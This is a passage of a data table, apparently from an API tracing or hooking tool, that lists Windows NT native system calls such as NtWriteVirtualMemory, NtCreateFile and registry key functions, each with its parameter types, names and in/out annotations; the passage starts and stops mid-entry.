[\"ProcessHandle\", \"*BaseAddress\", \"ZeroBits\", \"RegionSize\", \"AllocationType\", \"Protect\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__IN\", \"__IN_OUT\", \"__IN\", \"__IN\"]), \"NtFlushVirtualMemory\": (4, [\"HANDLE\", \"PVOID\", \"PULONG\", \"PIO_STATUS_BLOCK\"], [\"ProcessHandle\", \"*BaseAddress\", \"NumberOfBytesToFlush\", \"IoStatusBlock\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__IN_OUT\", \"__OUT\"]), \"NtFreeVirtualMemory\": (4, [\"HANDLE\", \"PVOID\", \"PULONG\", \"ULONG\"], [\"ProcessHandle\", \"*BaseAddress\", \"RegionSize\", \"FreeType\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_OUT\", \"__IN\"]), \"NtLockVirtualMemory\": (4, [\"HANDLE\", \"PVOID\", \"PULONG\", \"ULONG\"], [\"ProcessHandle\", \"*BaseAddress\", \"NumberOfBytesToLock\", \"LockOption\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_OUT\", \"__IN\"]), \"NtProtectVirtualMemory\": (5, [\"HANDLE\", \"PVOID\", \"PULONG\", \"ULONG\", \"PULONG\"], [\"ProcessHandle\", \"*BaseAddress\", \"NumberOfBytesToProtect\", \"NewAccessProtection\", \"OldAccessProtection\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__IN_OUT\", \"__IN\", \"__OUT\"]), \"NtQueryVirtualMemory\": (6, [\"HANDLE\", \"PVOID\", \"MEMORY_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"ProcessHandle\", \"BaseAddress\", \"MemoryInformationClass\", \"Buffer\", \"Length\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtReadVirtualMemory\": (5, [\"HANDLE\", \"PVOID\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"ProcessHandle\", \"BaseAddress\", \"Buffer\", \"NumberOfBytesToRead\", \"NumberOfBytesReaded\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtUnlockVirtualMemory\": (4, [\"HANDLE\", \"PVOID\", \"PULONG\", \"ULONG\"], [\"ProcessHandle\", \"*BaseAddress\", \"NumberOfBytesToUnlock\", \"LockType\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_OUT\", \"__IN\"]), \"NtWriteVirtualMemory\": (5, [\"HANDLE\", \"PVOID\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"ProcessHandle\", \"BaseAddress\", \"Buffer\", \"NumberOfBytesToWrite\", \"NumberOfBytesWritten\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT_opt\"]), \"NtQuerySecurityObject\": (5, [\"HANDLE\", \"SECURITY_INFORMATION\", \"PSECURITY_DESCRIPTOR\", \"ULONG\", \"PULONG\"], [\"ObjectHandle\", \"SecurityInformationClass\", \"DescriptorBuffer\", \"DescriptorBufferLength\", \"RequiredLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NTSetSecurityObject\": (3, [\"HANDLE\", \"SECURITY_INFORMATION\", \"PSECURITY_DESCRIPTOR\"], [\"ObjectHandle\", \"SecurityInformationClass\", \"DescriptorBuffer\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtDuplicateObject\": (7, [\"HANDLE\", \"PHANDLE\", \"HANDLE\", \"PHANDLE\", \"ACCESS_MASK\", \"BOOLEAN\", \"ULONG\"], [\"SourceProcessHandle\", \"SourceHandle\", \"TargetProcessHandle\", \"TargetHandle\", \"DesiredAccess\", \"InheritHandle\", \"Options\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__IN_opt\", \"__IN\", \"__IN\"]), \"NtMakeTemporaryObject\": (1, [\"HANDLE\"], [\"ObjectHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtQueryObject\": (5, [\"HANDLE\", \"OBJECT_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"ObjectHandle\", \"ObjectInformationClass\", \"ObjectInformation\", \"Length\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NTSetInformationObject\": (4, [\"HANDLE\", \"OBJECT_INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"ObjectHandle\", \"ObjectInformationClass\", \"ObjectInformation\", \"Length\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSignalAndWaitForSingleObject\": (4, [\"HANDLE\", \"HANDLE\", \"BOOLEAN\", \"PLARGE_INTEGER\"], [\"ObjectToSignal\", \"WaitableObject\", \"Alertable\", \"Time\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtWaitForMultipleObjects\": (5, [\"ULONG\", \"PHANDLE\", \"OBJECT_WAIT_TYPE\", \"BOOLEAN\", \"PLARGE_INTEGER\"], [\"ObjectCount\", \"ObjectsArray\", \"WaitType\", \"Alertable\", \"TimeOut\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtWaitForSingleObject\": (3, [\"HANDLE\", \"BOOLEAN\", \"PLARGE_INTEGER\"], [\"ObjectHandle\", \"Alertable\", \"TimeOut\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\"]), \"NtCreateDebugObject\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"BOOLEAN\"], [\"DebugObjectHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"KillProcessOnExit\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtDebugActiveProcess\": (2, [\"HANDLE\", \"HANDLE\"], [\"ProcessHandle\", \"DebugObjectHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtRemoveProcessDebug\": (2, [\"HANDLE\", \"HANDLE\"], [\"ProcessHandle\", \"DebugObjectHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtCreateDirectoryObject\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"DirectoryHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtOpenDirectoryObject\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"DirectoryObjectHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtQueryDirectoryObject\": (7, [\"HANDLE\", \"POBJDIR_INFORMATION\", \"ULONG\", \"BOOLEAN\", \"BOOLEAN\", \"PULONG\", \"PULONG\"], [\"DirectoryObjectHandle\", \"DirObjInformation\", \"BufferLength\", \"GetNextIndex\", \"IgnoreInputIndex\", \"ObjectIndex\", \"DataWritten\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_OUT\", \"__OUT_opt\"]), \"NtClearEvent\": (1, [\"HANDLE\"], [\"EventHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtCreateEvent\": (5, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"EVENT_TYPE\", \"BOOLEAN\"], [\"EventHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"EventType\", \"InitialState\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\"]), \"NtOpenEvent\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"EventHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtPulseEvent\": (2, [\"HANDLE\", \"PLONG\"], [\"EventHandle\", \"PreviousState\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\"]), \"NtQueryEvent\": (5, [\"HANDLE\", \"EVENT_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"EventHandle\", \"EventInformationClass\", \"EventInformation\", \"EventInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtResetEvent\": (2, [\"HANDLE\", \"PLONG\"], [\"EventHandle\", \"PreviousState\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\"]), \"NTSetEvent\": (2, [\"HANDLE\", \"PLONG\"], [\"EventHandle\", \"PreviousState\"], \"NTSTATUS\", [\"__IN\", \"__OUT_opt\"]), \"NTSetEventBoostPriority\": (1, [\"HANDLE\"], [\"EventHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtCreateEventPair\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"EventPairHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\"]), \"NtOpenEventPair\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"EventPairHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NTSetHighEventPair\": (1, [\"HANDLE\"], [\"EventPairHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NTSetHighWaitLowEventPair\": (1, [\"HANDLE\"], [\"EventPairHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NTSetHighWaitLowThread\": (0, [], [], \"NTSTATUS\", []), \"NTSetLowEventPair\": (1, [\"HANDLE\"], [\"EventPairHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NTSetLowWaitHighEventPair\": (1, [\"HANDLE\"], [\"EventPairHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NTSetLowWaitHighThread\": (0, [], [], \"NTSTATUS\", []), \"NtWaitHighEventPair\": (1, [\"HANDLE\"], [\"EventPairHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtWaitLowEventPair\": (1, [\"HANDLE\"], [\"EventPairHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtCancelIoFile\": (2, [\"HANDLE\", \"PIO_STATUS_BLOCK\"], [\"FileHandle\", \"IoStatusBlock\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtCreateFile\": (11, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PIO_STATUS_BLOCK\", \"PLARGE_INTEGER\", \"ULONG\", \"ULONG\", \"ULONG\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"FileHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"IoStatusBlock\", \"AllocationSize\", \"FileAttributes\", \"ShareAccess\", \"CreateDisposition\", \"CreateOptions\", \"EaBuffer\", \"EaLength\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__OUT\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtCreateMailslotFile\": (8, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"ULONG\", \"ULONG\", \"PLARGE_INTEGER\"], [\"MailslotFileHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"IoStatusBlock\", \"CreateOptions\", \"MailslotQuota\", \"MaxMessageSize\", \"ReadTimeOut\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtCreateNamedPipeFile\": (14, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"ULONG\", \"ULONG\", \"BOOLEAN\", \"BOOLEAN\", \"BOOLEAN\", \"ULONG\", \"ULONG\", \"ULONG\", \"PLARGE_INTEGER\"], [\"NamedPipeFileHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"IoStatusBlock\", \"ShareAccess\", \"CreateDisposition\", \"CreateOptions\", \"WriteModeMessage\", \"ReadModeMessage\", \"NonBlocking\", \"MaxInstances\", \"InBufferSize\", \"OutBufferSize\", \"DefaultTimeOut\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtCreatePagingFile\": (4, [\"PUNICODE_STRING\", \"PLARGE_INTEGER\", \"PLARGE_INTEGER\", \"PLARGE_INTEGER\"], [\"PageFileName\", \"MiniumSize\", \"MaxiumSize\", \"ActualSize\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT_opt\"]), \"NtDeleteFile\": (1, [\"POBJECT_ATTRIBUTES\"], [\"ObjectAttributes\"], \"NTSTATUS\", [\"__IN\"]), \"NtDeviceIoControlFile\": (10, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"IoControlCode\", \"InputBuffer\", \"InputBufferLength\", \"OutputBuffer\", \"OutputBufferLength\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__OUT_opt\", \"__IN\"]), \"NtFlushBuffersFile\": (2, [\"HANDLE\", \"PIO_STATUS_BLOCK\"], [\"FileHandle\", \"IoStatusBlock\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtFsControlFile\": (10, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"FsControlCode\", \"InputBuffer\", \"InputBufferLength\", \"OutputBuffer\", \"OutputBufferLength\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__OUT_opt\", \"__IN\"]), \"NtLockFile\": (10, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PLARGE_INTEGER\", \"PLARGE_INTEGER\", \"PULONG\", \"BOOLEAN\", \"BOOLEAN\"], [\"FileHandle\", \"LockGrantedEvent\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"ByteOffset\", \"Length\", \"Key\", \"ReturnImmediately\", \"ExclusiveLock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtNotifyChangeDirectoryFile\": (9, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"ULONG\", \"BOOLEAN\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"Buffer\", \"BufferSize\", \"CompletionFilter\", \"WatchTree\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtOpenFile\": (6, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"ULONG\"], [\"FileHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"IoStatusBlock\", \"ShareAccess\", \"OpenOptions\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__IN\"]), \"NtQueryAttributesFile\": (2, [\"POBJECT_ATTRIBUTES\", \"PFILE_BASIC_INFORMATION\"], [\"ObjectAttributes\", \"FileAttributes\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtQueryDirectoryFile\": (11, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FILE_INFORMATION_CLASS\", \"BOOLEAN\", \"PUNICODE_STRING\", \"BOOLEAN\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"FileInformation\", \"Length\", \"FileInformationClass\", \"ReturnSingleEntry\", \"FileMask\", \"RestartScan\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtQueryEaFile\": (9, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"BOOLEAN\", \"PVOID\", \"ULONG\", \"PULONG\", \"BOOLEAN\"], [\"FileHandle\", \"IoStatusBlock\", \"Buffer\", \"Length\", \"ReturnSingleEntry\", \"EaList\", \"EaListLength\", \"EaIndex\", \"RestartScan\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtQueryFullAttributesFile\": (2, [\"POBJECT_ATTRIBUTES\", \"PVOID\"], [\"ObjectAttributes\", \"Attributes\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtQueryInformationFile\": (5, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FILE_INFORMATION_CLASS\"], [\"FileHandle\", \"IoStatusBlock\", \"FileInformation\", \"Length\", \"FileInformationClass\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\"]), \"NtQueryOleDirectoryFile\": (11, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FILE_INFORMATION_CLASS\", \"BOOLEAN\", \"PUNICODE_STRING\", \"BOOLEAN\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"FileInformation\", \"Length\", \"FileInformationClass\", \"ReturnSingleEntry\", \"FileMask\", \"RestartScan\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtQueryVolumeInformationFile\": (5, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FS_INFORMATION_CLASS\"], [\"FileHandle\", \"IoStatusBlock\", \"FileSystemInformation\", \"Length\", \"FileSystemInformationClass\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN\"]), \"NtReadFile\": (9, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"PLARGE_INTEGER\", \"PULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"Buffer\", \"Length\", \"ByteOffset\", \"Key\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__OUT\", \"__IN\", \"__IN_opt\", \"__IN_opt\"]), \"NtReadFileScatter\": (9, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"FILE_SEGMENT_ELEMENT\", \"ULONG\", \"PLARGE_INTEGER\", \"PULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"SegmentArray\", \"Length\", \"ByteOffset\", \"Key\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NTSetEaFile\": (4, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\"], [\"FileHandle\", \"IoStatusBlock\", \"EaBuffer\", \"EaBufferSize\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN\"]), \"NTSetInformationFile\": (5, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FILE_INFORMATION_CLASS\"], [\"FileHandle\", \"IoStatusBlock\", \"FileInformation\", \"Length\", \"FileInformationClass\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NTSetVolumeInformationFile\": (5, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"FS_INFORMATION_CLASS\"], [\"FileHandle\", \"IoStatusBlock\", \"FileSystemInformation\", \"Length\", \"FileSystemInformationClass\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtUnlockFile\": (5, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PLARGE_INTEGER\", \"PLARGE_INTEGER\", \"PULONG\"], [\"FileHandle\", \"IoStatusBlock\", \"ByteOffset\", \"Length\", \"Key\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtWriteFile\": (9, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"PVOID\", \"ULONG\", \"PLARGE_INTEGER\", \"PULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"Buffer\", \"Length\", \"ByteOffset\", \"Key\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\"]), \"NtWriteFileGather\": (9, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"FILE_SEGMENT_ELEMENT\", \"ULONG\", \"PLARGE_INTEGER\", \"PULONG\"], [\"FileHandle\", \"Event\", \"ApcRoutine\", \"ApcContext\", \"IoStatusBlock\", \"SegmentArray\", \"Length\", \"ByteOffset\", \"Key\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtCreateIoCompletion\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\"], [\"IoCompletionHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"NumberOfConcurrentThreads\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtOpenIoCompletion\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"IoCompletionHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtQueryIoCompletion\": (5, [\"HANDLE\", \"IO_COMPLETION_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"IoCompletionHandle\", \"InformationClass\", \"IoCompletionInformation\", \"InformationBufferLength\", \"RequiredLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT_opt\"]), \"NtRemoveIoCompletion\": (5, [\"HANDLE\", \"PULONG\", \"PULONG\", \"PIO_STATUS_BLOCK\", \"PLARGE_INTEGER\"], [\"IoCompletionHandle\", \"CompletionKey\", \"CompletionValue\", \"IoStatusBlock\", \"Timeout\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\", \"__OUT\", \"__IN_opt\"]), \"NTSetIoCompletion\": (5, [\"HANDLE\", \"ULONG\", \"PIO_STATUS_BLOCK\", \"NTSTATUS\", \"ULONG\"], [\"IoCompletionHandle\", \"CompletionKey\", \"IoStatusBlock\", \"CompletionStatus\", \"NumberOfBytesTransfered\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__IN\"]), \"NtCompactKeys\": (2, [\"ULONG\", \"HANDLE\"], [\"NrOfKeys\", \"KeysArray[]\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtCompressKey\": (1, [\"HANDLE\"], [\"Key\"], \"NTSTATUS\", [\"__IN\"]), \"NtCreateKey\": (7, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"PUNICODE_STRING\", \"ULONG\", \"PULONG\"], [\"pKeyHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"TitleIndex\", \"Class\", \"CreateOptions\", \"Disposition\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__OUT_opt\"]), \"NtDeleteKey\": (1, [\"HANDLE\"], [\"KeyHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtDeleteValueKey\": (2, [\"HANDLE\", \"PUNICODE_STRING\"], [\"KeyHandle\", \"ValueName\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtEnumerateKey\": (6, [\"HANDLE\", \"ULONG\", \"KEY_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"KeyHandle\", \"Index\", \"KeyInformationClass\", \"KeyInformation\", \"Length\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NtEnumerateValueKey\": (6, [\"HANDLE\", \"ULONG\", \"KEY_VALUE_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"KeyHandle\", \"Index\", \"KeyValueInformation\", \"KeyValueInformation\", \"Length\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NtFlushKey\": (1, [\"HANDLE\"], [\"KeyHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtLoadKey\": (2, [\"POBJECT_ATTRIBUTES\", \"POBJECT_ATTRIBUTES\"], [\"DestinationKeyName\", \"HiveFileName\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtLoadKey2\": (3, [\"POBJECT_ATTRIBUTES\", \"POBJECT_ATTRIBUTES\", \"ULONG\"], [\"DestinationKeyName\", \"HiveFileName\", \"Flags\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtNotifyChangeKey\": (10, [\"HANDLE\", \"HANDLE\", \"PIO_APC_ROUTINE\", \"PVOID\", \"PIO_STATUS_BLOCK\", \"ULONG\", \"BOOLEAN\", \"PVOID\", \"ULONG\", \"BOOLEAN\"], [\"KeyHandle\", \"EventHandle\", \"ApcRoutine\", \"ApcRoutineContext\", \"IoStatusBlock\", \"NotifyFilter\", \"WatchSubtree\", \"RegChangesDataBuffer\", \"RegChangesDataBufferLength\", \"Asynchronous\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__IN\"]), \"NtOpenKey\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"pKeyHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\"]), \"NtQueryKey\": (5, [\"HANDLE\", \"KEY_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"KeyHandle\", \"KeyInformationClass\", \"KeyInformation\", \"Length\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NtQueryMultipleValueKey\": (6, [\"HANDLE\", \"PKEY_MULTIPLE_VALUE_INFORMATION\", \"ULONG\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"KeyHandle\", \"ValuesList\", \"NumberOfValues\", \"DataBuffer\", \"BufferLength\", \"RequiredLength\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__IN\", \"__OUT\", \"__IN_OUT\", \"__OUT_opt\"]), \"NtQueryValueKey\": (6, [\"HANDLE\", \"PUNICODE_STRING\", \"KEY_VALUE_INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"KeyHandle\", \"ValueName\", \"KeyValueInformationClass\", \"KeyValueInformation\", \"Length\", \"ResultLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__IN\", \"__OUT\"]), \"NtReplaceKey\": (3, [\"POBJECT_ATTRIBUTES\", 